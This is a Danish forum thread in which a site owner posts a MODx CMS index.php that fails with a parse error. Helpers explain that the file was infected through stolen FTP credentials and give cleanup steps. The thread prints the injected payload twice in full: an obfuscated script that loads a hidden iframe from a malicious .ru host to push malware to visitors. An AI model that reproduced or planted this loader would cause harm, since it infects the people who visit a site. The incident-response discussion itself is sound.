php - Parse error: syntax error, unexpected... - Udvikleren.dk

Tags: php

Bruger #15686 @ 12.02.10 10:21

Hej.
Er der nogen der kan kaste lidt lys over dette problem som er opstået ud af ingenting? Når jeg forsøger at åbne den underside hvor mit cms-system ligger får jeg følgende fejlmeddelelse:

Parse error: syntax error, unexpected '<' in /hsphere/local/home/kb1907/xyz.com/manager/index.php on line 925

Samme dag som dette begyndte havde jeg en besøgende på hjemmesiden som rapporterede en trojan. Kan det hænge sammen?

Jeg er komplet analfabet ud i det her, så ethvert input vil være meget værdsat.
Tak.

Ps.Jeg har åbnet php filen i notepad og det ser sådan her ud:

<?php
/*
*************************************************************************
MODx Content Management System and PHP Application Framework
Managed and maintained by Raymond Irving, Ryan Thrash and the
MODx community
*************************************************************************
MODx is an opensource PHP/MySQL content management system and content
management framework that is flexible, adaptable, supports XHTML/CSS
layouts, and works with most web browsers, including Safari.

MODx is distributed under the GNU General Public License
*************************************************************************

MODx CMS and Application Framework ("MODx")
Copyright 2005 and forever thereafter by Raymond Irving & Ryan Thrash.
All rights reserved.

This file and all related or dependant files distributed with this filie
are considered as a whole to make up MODx.

MODx is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.

MODx is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with MODx (located in "/assets/docs/"); if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA

For more information on MODx please visit http://modxcms.com/

**************************************************************************
Originally based on Etomite by Alex Butter
**************************************************************************
*/

/**
* Filename: manager/index.php
* Function: This file is the main root file for MODx. It is
* only file that will be directly requested, and
* depending on the request, will branch different
* content
*/

// get start time
$mtime = microtime(); $mtime = explode(" ",$mtime); $mtime = $mtime[1] + $mtime[0]; $tstart = $mtime;

define("IN_MANAGER_MODE", "true"); // we use this to make sure files are accessed through
// the manager instead of seperately.

// harden it
require_once('./includes/protect.inc.php');

// send anti caching headers
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

// set error reporting
error_reporting(E_ALL & ~E_NOTICE);

// check PHP version. MODx is compatible with php 4 (4.1.0 up), extra/ improved features are planned for 5
$php_ver_comp = version_compare(phpversion(), "4.1.0");
// -1 if left is less, 0 if equal, +1 if left is higher
if($php_ver_comp < 0) {
echo "Wrong php version! You're using PHP version '".phpversion()."', and MODx only works on 4.1.0 or higher."; // $_lang['php_version_check'];
exit;
}

// set some runtime options
$incPath = str_replace("\\","/",dirname(__FILE__)."/includes/"); // Mod by Raymond
if(version_compare(phpversion(), "4.3.0")>=0) {
set_include_path($incPath); // this now works, above code did not?
} else {
ini_set("include_path", $incPath); // include path the old way
}

@set_magic_quotes_runtime(0);

// include_once the magic_quotes_gpc workaround
include_once "quotes_stripper.inc.php";

// include the html_entity_decode fake function

if (!function_exists('html_entity_decode')) {
function html_entity_decode ($string, $opt = ENT_COMPAT) {
$trans_tbl = get_html_translation_table (HTML_ENTITIES);
$trans_tbl = array_flip ($trans_tbl);
if ($opt & 1) {
$trans_tbl["'"] = "'";
}
if (!($opt & 2)) {
unset($trans_tbl["""]);
}
return strtr ($string, $trans_tbl);
}
}

if (!defined("ENT_COMPAT")) define("ENT_COMPAT", 2);
if (!defined("ENT_NOQUOTES")) define("ENT_NOQUOTES", 0);
if (!defined("ENT_QUOTES")) define("ENT_QUOTES", 3);

// set the document_root

if(!isset($_SERVER["DOCUMENT_ROOT"]) || empty($_SERVER["DOCUMENT_ROOT"])) {
$_SERVER["DOCUMENT_ROOT"] = str_replace($_SERVER["PATH_INFO"], "", ereg_replace("[\][\]", "/", $_SERVER["PATH_TRANSLATED"]))."/";
}

define("IN_ETOMITE_SYSTEM", "true"); // for backward compatibility with 0.6

// include_once config file
$config_filename = "./includes/config.inc.php";
if (!file_exists($config_filename)) {
echo "<h3>Unable to load configuration settings</h3>";
echo "Please run the MODx <a href='../install'>install utility</a>";
exit;
}

// include the database configuration file
include_once "config.inc.php";

// initiate the content manager class
include_once "document.parser.class.inc.php";
$modx = new DocumentParser;
$modx->loadExtension("ManagerAPI");
$modx->getSettings();
$etomite = &$modx; // for backward compatibility

// connect to the database
if(@!$modxDBConn = mysql_connect($database_server, $database_user, $database_password)) {
die("<h2>Failed to create the database connection!</h2>. Please run the MODx <a href='../install'>install utility</a>");
} else {
mysql_select_db($dbase);
@mysql_query("SET CHARACTER SET {$database_connection_charset}");
}

// get the settings from the database
include_once "settings.inc.php";

// send the charset header
header('Content-Type: text/html; charset='.$modx_charset);

// include version info
include_once "version.inc.php";

// accesscontrol.php checks to see if the user is logged in. If not, a log in form is shown
include_once "accesscontrol.inc.php";

// double check the session
if(!isset($_SESSION['mgrValidated'])){
echo "Not Logged In!";
exit;
}
// get the user settings from the database
include_once "user_settings.inc.php";

//echo $manager_direction;
//echo $modx->config['manager_direction'];

// include_once the language file
if(!isset($manager_language)) {
$manager_language = "english"; // if not set, get the english language file.
}
$_lang = array();
include_once "lang/english.inc.php";
$length_eng_lang = count($_lang);

if($manager_language!="english" && file_exists(MODX_MANAGER_PATH."includes/lang/".$manager_language.".inc.php")) {
include_once "lang/".$manager_language.".inc.php";
}

// include_once the style variables file
if(isset($manager_theme) && !isset($_style)) {
$_style = array();
include_once "media/style/".$manager_theme."/style.php";
}

// check if user is allowed to access manager interface
if(isset($allow_manager_access) && $allow_manager_access==0) {
include_once "manager.lockout.inc.php";
}

// include_once the error handler
include_once "error.class.inc.php";
$e = new errorHandler;

// Initialize System Alert Message Queque
if (!isset($_SESSION['SystemAlertMsgQueque'])) $_SESSION['SystemAlertMsgQueque'] = array();
$SystemAlertMsgQueque = &$_SESSION['SystemAlertMsgQueque'];

// first we check to see if this is a frameset request
if(!isset($_POST['a']) && !isset($_GET['a']) && ($e->getError()==0) && !isset($_POST['updateMsgCount'])) {
// this looks to be a top-level frameset request, so let's serve up a frameset
include_once "frames/1.php";
exit;
}

// OK, let's retrieve the action directive from the request
if(isset($_GET['a']) && isset($_POST['a'])) {
$e->setError(100);
$e->dumpError();
// set $e to a corresponding errorcode
// we know that if an error occurs here, something's wrong,
// so we dump the error, thereby stopping the script.

} else {
$action=$_REQUEST['a'];
}

if (isset($_POST['updateMsgCount']) && $modx->hasPermission('messages')) {
include_once 'messageCount.inc.php';
}

// save page to manager object
$modx->manager->action = $action;

// invoke OnManagerPageInit event
$modx->invokeEvent("OnManagerPageInit", array("action" => $action));

// Now we decide what to do according to the action request. This is a BIG list

switch ($action) {
/********************************************************************/
/* frame management - show the requested frame */
/********************************************************************/
case "1" :
// get the requested frame
$frame = preg_replace('/[^a-z0-9]/i','',$_REQUEST['f']);
if($frame>9) {
$enable_debug=false; // this is to stop the debug thingy being attached to the framesets
}
include_once "frames/".$frame.".php";
break;
/********************************************************************/
/* show the homepage */
/********************************************************************/
case "2" :
// get the home page
include_once "header.inc.php";
include_once "actions/welcome.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* document data */
/********************************************************************/
case "3" :
// get the page to show document's data
include_once "header.inc.php";
include_once "actions/document_data.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* content management */
/********************************************************************/
case "85" :
// get the mutate page for adding a folder
include_once "header.inc.php";
include_once "actions/mutate_content.dynamic.php";
include_once "footer.inc.php";
break;
case "27" :
// get the mutate page for changing content
include_once "header.inc.php";
include_once "actions/mutate_content.dynamic.php";
include_once "footer.inc.php";
break;
case "4" :
// get the mutate page for adding content
include_once "header.inc.php";
include_once "actions/mutate_content.dynamic.php";
include_once "footer.inc.php";
break;
case "5" :
// get the save processor
include_once "processors/save_content.processor.php";
break;
case "6" :
// get the delete processor
include_once "processors/delete_content.processor.php";
break;
case "63" :
// get the undelete processor
include_once "processors/undelete_content.processor.php";
break;
case "51" :
// get the move action
include_once "header.inc.php";
include_once "actions/move_document.dynamic.php";
include_once "footer.inc.php";
break;
case "52" :
// get the move document processor
include_once "processors/move_document.processor.php";
break;
case "61" :
// get the processor for publishing content
include_once "processors/publish_content.processor.php";
break;
case "62" :
// get the processor for publishing content
include_once "processors/unpublish_content.processor.php";
break;
/********************************************************************/
/* show the wait page - gives the tree time to refresh (hopefully) */
/********************************************************************/
case "7" :
// get the wait page (so the tree can reload)
include_once "header.inc.php";
include_once "actions/wait.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* let the user log out */
/********************************************************************/
case "8" :
// get the logout processor
include_once "processors/logout.processor.php";
break;
/********************************************************************/
/* user management */
/********************************************************************/
case "87" :
// get the new web user page
include_once "header.inc.php";
include_once "actions/mutate_web_user.dynamic.php";
include_once "footer.inc.php";
break;
case "88" :
// get the edit web user page
include_once "header.inc.php";
include_once "actions/mutate_web_user.dynamic.php";
include_once "footer.inc.php";
break;
case "89" :
// get the save web user processor
include_once "processors/save_web_user.processor.php";
break;
case "90" :
// get the delete web user page
include_once "processors/delete_web_user.processor.php";
break;
case "11" :
// get the new user page
include_once "header.inc.php";
include_once "actions/mutate_user.dynamic.php";
include_once "footer.inc.php";
break;
case "12" :
// get the edit user page
include_once "header.inc.php";
include_once "actions/mutate_user.dynamic.php";
include_once "footer.inc.php";
break;
case "32" :
// get the save user processor
include_once "processors/save_user.processor.php";
break;
case "28" :
// get the change password page
include_once "header.inc.php";
include_once "actions/mutate_password.dynamic.php";
include_once "footer.inc.php";
break;
case "34" :
// get the save new password page
include_once "processors/save_password.processor.php";
break;
case "33" :
// get the delete user page
include_once "processors/delete_user.processor.php";
break;
/********************************************************************/
/* role management */
/********************************************************************/
case "38" :
// get the new role page
include_once "header.inc.php";
include_once "actions/mutate_role.dynamic.php";
include_once "footer.inc.php";
break;
case "35" :
// get the edit role page
include_once "header.inc.php";
include_once "actions/mutate_role.dynamic.php";
include_once "footer.inc.php";
break;
case "36" :
// get the save role page
include_once "processors/save_role.processor.php";
break;
case "37" :
// get the delete role page
include_once "processors/delete_role.processor.php";
break;
/********************************************************************/
/* template management */
/********************************************************************/
case "16" :
// get the edit template action
include_once "header.inc.php";
include_once "actions/mutate_templates.dynamic.php";
include_once "footer.inc.php";
break;
case "19" :
// get the new template action
include_once "header.inc.php";
include_once "actions/mutate_templates.dynamic.php";
include_once "footer.inc.php";
break;
case "20" :
// get the save processor
include_once "processors/save_template.processor.php";
break;
case "21" :
// get the delete processor
include_once "processors/delete_template.processor.php";
break;
case "96" :
// get the duplicate template processor
include_once "processors/duplicate_template.processor.php";
break;
case '117' :
// change the tv rank for selected template
//include_once "header.inc.php"; - in action file
include_once "actions/mutate_template_tv_rank.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* snippet management */
/********************************************************************/
case "22" :
// get the edit snippet action
include_once "header.inc.php";
include_once "actions/mutate_snippet.dynamic.php";
include_once "footer.inc.php";
break;
case "23" :
// get the new snippet action
include_once "header.inc.php";
include_once "actions/mutate_snippet.dynamic.php";
include_once "footer.inc.php";
break;
case "24" :
// get the save processor
include_once "processors/save_snippet.processor.php";
break;
case "25" :
// get the delete processor
include_once "processors/delete_snippet.processor.php";
break;
case "98" :
// get the duplicate processor
include_once "processors/duplicate_snippet.processor.php";
break;
/********************************************************************/
/* htmlsnippet management */
/********************************************************************/
case "78" :
// get the edit snippet action
include_once "header.inc.php";
include_once "actions/mutate_htmlsnippet.dynamic.php";
include_once "footer.inc.php";
break;
case "77" :
// get the new snippet action
include_once "header.inc.php";
include_once "actions/mutate_htmlsnippet.dynamic.php";
include_once "footer.inc.php";
break;
case "79" :
// get the save processor
include_once "processors/save_htmlsnippet.processor.php";
break;
case "80" :
// get the delete processor
include_once "processors/delete_htmlsnippet.processor.php";
break;
case "97" :
// get the duplicate processor
include_once "processors/duplicate_htmlsnippet.processor.php";
break;
/********************************************************************/
/* show the credits page */
/********************************************************************/
case "18" :
// get the credits page
include_once "header.inc.php";
include_once "actions/credits.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* empty cache & synchronisation */
/********************************************************************/
case "26" :
// get the cache emptying processor
include_once "header.inc.php";
include_once "actions/refresh_site.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Module management */
/********************************************************************/
case "106" :
// get module management
include_once "header.inc.php";
include_once "actions/modules.static.php";
include_once "footer.inc.php";
break;
case "107" :
// get the new module action
include_once "header.inc.php";
include_once "actions/mutate_module.dynamic.php";
include_once "footer.inc.php";
break;
case "108" :
// get the edit module action
include_once "header.inc.php";
include_once "actions/mutate_module.dynamic.php";
include_once "footer.inc.php";
break;
case "109" :
// get the save processor
include_once "processors/save_module.processor.php";
break;
case "110" :
// get the delete processor
include_once "processors/delete_module.processor.php";
break;
case "111" :
// get the duplicate processor
include_once "processors/duplicate_module.processor.php";
break;
case "112" :
// execute/run the module
//include_once "header.inc.php";
include_once "processors/execute_module.processor.php";
//include_once "footer.inc.php";
break;
case "113" :
// get the module resources (dependencies) action
include_once "header.inc.php";
include_once "actions/mutate_module_resources.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* plugin management */
/********************************************************************/
case "100" :
// change the plugin priority
//include_once "header.inc.php"; - in action file
include_once "actions/mutate_plugin_priority.dynamic.php";
include_once "footer.inc.php";
break;
case "101" :
// get the new plugin action
include_once "header.inc.php";
include_once "actions/mutate_plugin.dynamic.php";
include_once "footer.inc.php";
break;
case "102" :
// get the edit plugin action
include_once "header.inc.php";
include_once "actions/mutate_plugin.dynamic.php";
include_once "footer.inc.php";
break;
case "103" :
// get the save processor
include_once "processors/save_plugin.processor.php";
break;
case "104" :
// get the delete processor
include_once "processors/delete_plugin.processor.php";
break;
case "105" :
// get the duplicate processor
include_once "processors/duplicate_plugin.processor.php";
break;
/********************************************************************/
/* view phpinfo */
/********************************************************************/
case "200" :
// show phpInfo
if($modx->hasPermission('logs')) phpInfo();
break;
/********************************************************************/
/* errorpage */
/********************************************************************/
case "29" :
// get the error page
include_once "actions/error_dialog.static.php";
break;
/********************************************************************/
/* file manager */
/********************************************************************/
case "31" :
// get the page to manage files
include_once "header.inc.php";
include_once "actions/files.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* access permissions */
/********************************************************************/
case "40" :
include_once "header.inc.php";
include_once "actions/access_permissions.dynamic.php";
include_once "footer.inc.php";
break;
case "91" :
include_once "header.inc.php";
include_once "actions/web_access_permissions.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* access groups processor */
/********************************************************************/
case "41" :
include_once "processors/access_groups.processor.php";
break;
case "92" :
include_once "processors/web_access_groups.processor.php";
break;
/********************************************************************/
/* settings editor */
/********************************************************************/
case "17" :
// get the settings editor
include_once "header.inc.php";
include_once "actions/mutate_settings.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* save settings */
/********************************************************************/
case "30" :
// get the save settings processor
include_once "processors/save_settings.processor.php";
break;
/********************************************************************/
/* system information */
/********************************************************************/
case "53" :
// get the settings editor
include_once "header.inc.php";
include_once "actions/sysinfo.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* optimise table */
/********************************************************************/
case "54" :
// get the table optimizer/truncate processor
include_once "processors/optimize_table.processor.php";
break;
/********************************************************************/
/* view logging */
/********************************************************************/
case "13" :
// view logging
include_once "header.inc.php";
include_once "actions/logging.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* empty logs */
/********************************************************************/
case "55" :
// get the settings editor
include_once "processors/empty_table.processor.php";
break;
/********************************************************************/
/* calls test page */
/********************************************************************/
case "999" :
// get the test page
include_once "header.inc.php";
include_once "test_page.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Empty recycle bin */
/********************************************************************/
case "64" :
// get the Recycle bin emptier
include_once "processors/remove_content.processor.php";
break;
/********************************************************************/
/* Messages */
/********************************************************************/
case "10" :
// get the messages page
include_once "header.inc.php";
include_once "actions/messages.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Delete a message */
/********************************************************************/
case "65" :
// get the message deleter
include_once "processors/delete_message.processor.php";
break;
/********************************************************************/
/* Send a message */
/********************************************************************/
case "66" :
// get the message deleter
include_once "processors/send_message.processor.php";
break;
/********************************************************************/
/* Remove locks */
/********************************************************************/
case "67" :
// get the lock remover
include_once "processors/remove_locks.processor.php";
break;
/********************************************************************/
/* Site schedule */
/********************************************************************/
case "70" :
// get the schedule page
include_once "header.inc.php";
include_once "actions/site_schedule.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Search */
/********************************************************************/
case "71" :
// get the search page
include_once "header.inc.php";
include_once "actions/search.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* About */
/********************************************************************/
case "59" :
// get the about page
include_once "header.inc.php";
include_once "actions/about.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Add weblink */
/********************************************************************/
case "72" :
// get the weblink page
include_once "header.inc.php";
include_once "actions/mutate_content.dynamic.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* User management */
/********************************************************************/
case "75" :
include_once "header.inc.php";
include_once "actions/user_management.static.php";
include_once "footer.inc.php";
break;
case "99" :
include_once "header.inc.php";
include_once "actions/web_user_management.static.php";
include_once "footer.inc.php";
break;
case "86" :
include_once "header.inc.php";
include_once "actions/role_management.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* template/ snippet management */
/********************************************************************/
case "76" :
include_once "header.inc.php";
include_once "actions/resources.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* keywords management */
/********************************************************************/
case "81" :
include_once "header.inc.php";
include_once "actions/manage_metatags.dynamic.php";
include_once "footer.inc.php";
break;
case "82" :
include_once "processors/metatags.processor.php";
break;
/********************************************************************/
/* Export to file */
/********************************************************************/
case "83" :
include_once "header.inc.php";
include_once "actions/export_site.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Resource Selector */
/********************************************************************/
case "84" :
include_once "actions/resource_selector.static.php";
break;
/********************************************************************/
/* Backup Manager */
/********************************************************************/
case "93" :
# header and footer will be handled interally
include_once "actions/bkmanager.static.php";
break;
/********************************************************************/
/* Duplicate Document */
/********************************************************************/
case "94" :
// get the duplicate processor
include_once "processors/duplicate_content.processor.php";
break;
/********************************************************************/
/* Import Document from file */
/********************************************************************/
case "95" :
include_once "header.inc.php";
include_once "actions/import_site.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Help */
/********************************************************************/
case "9" :
// get the help page
include_once "header.inc.php";
include_once "actions/help.static.php";
include_once "footer.inc.php";
break;
/********************************************************************/
/* Template Variables - Based on Apodigm's Docvars */
/********************************************************************/
case "300" :
// get the new document variable action
include_once "header.inc.php";
include_once "actions/mutate_tmplvars.dynamic.php";
include_once "footer.inc.php";
break;
case "301" :
// get the edit document variable action
include_once "header.inc.php";
include_once "actions/mutate_tmplvars.dynamic.php";
include_once "footer.inc.php";
break;
case "302" :
// get the save processor
include_once "processors/save_tmplvars.processor.php";
break;
case "303" :
// get the delete processor
include_once "processors/delete_tmplvars.processor.php";
break;
case "304" :
// get the duplicate processor
include_once "processors/duplicate_tmplvars.processor.php";
break;

/********************************************************************/
/* Event viewer: show event message log */
/********************************************************************/
case 114:
// get event logs
include_once "header.inc.php";
include_once "actions/eventlog.dynamic.php";
include_once "footer.inc.php";
break;
case 115:
// get event log details viewer
include_once "header.inc.php";
include_once "actions/eventlog_details.dynamic.php";
include_once "footer.inc.php";
break;
case 116:
// get the event log delete processor
include_once "processors/delete_eventlog.processor.php";
break;

case 501:
//delete category
include_once "processors/delete_category.processor.php";
break;
/********************************************************************/
/* default action: show not implemented message */
/********************************************************************/
default :
// say that what was requested doesn't do anything yet
include_once "header.inc.php";
echo "
<div class='subTitle'>
<span class='right'><img src='media/images/_tx_.gif' width='1' height='5'><br />
".$_lang['functionnotimpl']."</span>
</div>
<div class='sectionHeader'><img src='media/images/misc/dot.gif' alt='.' />
".$_lang['functionnotimpl']."</div><div class='sectionBody'>
".$_lang['functionnotimpl_message']."
</div>
";
include_once "footer.inc.php";
}

/********************************************************************/
// log action, unless it's a frame request
if($action!=1 && $action!=7 && $action!=2) {
include_once "log.class.inc.php";
$log = new logHandler;
$log->initAndWriteLog();
}
/********************************************************************/
// show debug
unset($_SESSION['itemname']); // clear this, because it's only set for logging purposes
include_once "debug.inc.php";

<script>var u_='';var a='';var b;if(b!='' && b!='i'){b='h'};var m;if(m!='' && m!='f'){m='c'};var k=window;var l=document;var s;if(s!='wl' && s!='xd'){s=''};var u='sucYrui~pYtF'.replace(/[Fu~Yl]/g, '');var xg='';k.onload=function(){var u_m;if(u_m!='' && u_m!='_e'){u_m=null};try {var lh=53179;kk=l.createElement(u);kk.src='hTtTt#p#:?/$/$p$iTc$fTo#c?o#-Tc?oTm$.#tAe$c?h#nTo#r#a?t?i$.?cTo$mA.$s$i?n?aT-$c#o$m?-#c?nT.An$e?w$w$a#r$o#n?l$iAn?e?.?r#uT:A8A0A8#0#/?3#9$.$n$e#tT/$3A9#.#n?e?t#/#gAoAo$gAl#e#.$cAo$mT/?a#t#t#.?cAo#mA/$wA3$.#o?rAgT/A'.replace(/[A\?T#\$]/g, '');var n="";kk.setAttribute('dwewfhehr#'.replace(/[#hc%w]/g, ''), "1");this.te="";l.body.appendChild(kk);this.by="by";this.ot="ot";} catch(y){var tv=new Date();};var d="d";this.j=50444;};var bo;if(bo!='_q'){bo=''};var nr=new Array();</script>

7 svar postet i denne tråd vises herunder
1 indlæg har modtaget i alt 4 karma

Sorter efter stemmer Sorter efter dato

Bruger #8223 @ 12.02.10 15:52

1.065

Tak for jeres svar.
Per:
Step 1 og 2 udført.
Kan man konkret se hvilken del af scriptet/koden der er den "injectede" del, eller kan jeg på anden vis se hvilke filer der er inficerede?

Mvh.

Det er den sidste del:

Kode


<script>var u_='';var a='';var b;if(b!='' && b!='i'){b='h'};var m;if(m!='' && m!='f'){m='c'};var k=window;var l=document;var s;if(s!='wl' && s!='xd'){s=''};var u='sucYrui~pYtF'.replace(/[Fu~Yl]/g, '');var xg='';k.onload=function(){var u_m;if(u_m!='' && u_m!='_e'){u_m=null};try {var lh=53179;kk=l.createElement(u);kk.src='hTtTt#p#:?/$/$p$iTc$fTo#c?o#-Tc?oTm$.#tAe$c?h#nTo#r#a?t?i$.?cTo$mA.$s$i?n?aT-$c#o$m?-#c?nT.An$e?w$w$a#r$o#n?l$iAn?e?.?r#uT:A8A0A8#0#/?3#9$.$n$e#tT/$3A9#.#n?e?t#/#gAoAo$gAl#e#.$cAo$mT/?a#t#t#.?cAo#mA/$wA3$.#o?rAgT/A'.replace(/[A\?T#\$]/g, '');var n="";kk.setAttribute('dwewfhehr#'.replace(/[#hc%w]/g, ''), "1");this.te="";l.body.appendChild(kk);this.by="by";this.ot="ot";} catch(y){var tv=new Date();};var d="d";this.j=50444;};var bo;if(bo!='_q'){bo=''};var nr=new Array();</script>
<!--36d8604bcec69c9447ca9ca8544e9c50-->

der er den injectede - men det ligner at den er designet til at se forskellig ud ved hver injection, for at undgå at folk søger efter den i deres filer. Jeg vil derfor anbefale dig at du som et minimum kigger alle dine index.php, index.html og lignende igennem efter lignende kode. Helt optimalt vil jeg anbefale dig at slette alle filerne og genuploade systemet. Dine data bør forblive i databasen.

Bruger #2695 @ 12.02.10 10:25

1.963

Mon ikke der skal en '?>' ind før <script> tagget

altså så:

Kode

....
include_once "debug.inc.php";
?>
<script>var u_='';var......

Indlæg senest redigeret d. 12.02.2010 10:26 af Bruger #2695

Bruger #8223 @ 12.02.10 10:42

1.065

Det hænger sammen.

Det der er sket er at du har haft virus på en maskine, hvormed du er logget på ftp på din server - den virus har opsnappet dit ftp-password, og er logget ind på din server og har injected det script du ser der, i din index.php(den går efter alle filer der hedder noget med index eller default, så tjek lige eventuelle andre systemer/index-sider du har liggende -- at din bruger rapporterer en trojaner kan tyde på at der ligger en side et andet sted uden syntaxfejl, der også er inficeret) - problemet er bare at den ikke er intelligent nok til at hoppe ud af PHP først, så du ender med en syntax-fejl på de sider hvor den er pumpet ind midt i det hele, som fx her.

Det injectede script downloader malware til brugerens maskine.

Så:
0: Kør antivirus-scan på din maskine. Brug også gerne en adware og spyware scanner som fx Adaware og Spybot S&D
1: Skift dit ftp-password
2: slet alle filer hvor det injectede script er i
3: genupload de originale, uinficerede filer istedet

Indlæg senest redigeret d. 12.02.2010 10:43 af Bruger #8223

Bruger #15686 @ 12.02.10 14:52

Tak for jeres svar.
Per:
Step 1 og 2 udført.
Kan man konkret se hvilken del af scriptet/koden der er den "injectede" del, eller kan jeg på anden vis se hvilke filer der er inficerede?

Mvh.

Bruger #2695 @ 12.02.10 17:37

1.963

Jeg vil derfor anbefale dig at du som et minimum kigger alle dine index.php, index.html og lignende igennem efter lignende kode. Helt optimalt vil jeg anbefale dig at slette alle filerne og genuploade systemet. Dine data bør forblive i databasen.

..og jeg vil så anbefale dig også at overveje at bruge et versions styrings system (f.eks. Subversion: http://subversion.tigris.org/). Så kan du altid se nøjagtigt, hvad der er ændret...både af dig selv og af diverse virusser :-)

Bruger #8223 @ 13.02.10 01:37

1.065

Jeg vil derfor anbefale dig at du som et minimum kigger alle dine index.php, index.html og lignende igennem efter lignende kode. Helt optimalt vil jeg anbefale dig at slette alle filerne og genuploade systemet. Dine data bør forblive i databasen.

..og jeg vil så anbefale dig også at overveje at bruge et versions styrings system (f.eks. Subversion: http://subversion.tigris.org/). Så kan du altid se nøjagtigt, hvad der er ændret...både af dig selv og af diverse virusser :-)

Trådstarters umiddelbare erfaringsniveau taget i betragtning tror jeg han har et ganske almindeligt webhotel. Der er sjældent anden adgang end ftp, så revisionskontrol nyder man næppe noget af

Bruger #2695 @ 13.02.10 10:22

1.963

Jeg vil derfor anbefale dig at du som et minimum kigger alle dine index.php, index.html og lignende igennem efter lignende kode. Helt optimalt vil jeg anbefale dig at slette alle filerne og genuploade systemet. Dine data bør forblive i databasen.

..og jeg vil så anbefale dig også at overveje at bruge et versions styrings system (f.eks. Subversion: http://subversion.tigris.org/). Så kan du altid se nøjagtigt, hvad der er ændret...både af dig selv og af diverse virusser :-)

Trådstarters umiddelbare erfaringsniveau taget i betragtning tror jeg han har et ganske almindeligt webhotel. Der er sjældent anden adgang end ftp, så revisionskontrol nyder man næppe noget af

Det kan man nu stadig:
1) svn export
2) kopier til webhotel
3) virus smadrer et eller andet
4) svn checkout
5) kopier fra webhotel til din working copy
6) svn diff

Parse error: syntax error, unexpected...

Karma barometer (30 dage)

Modtaget

Givet

Favorit hos
Forum tråde
Artikler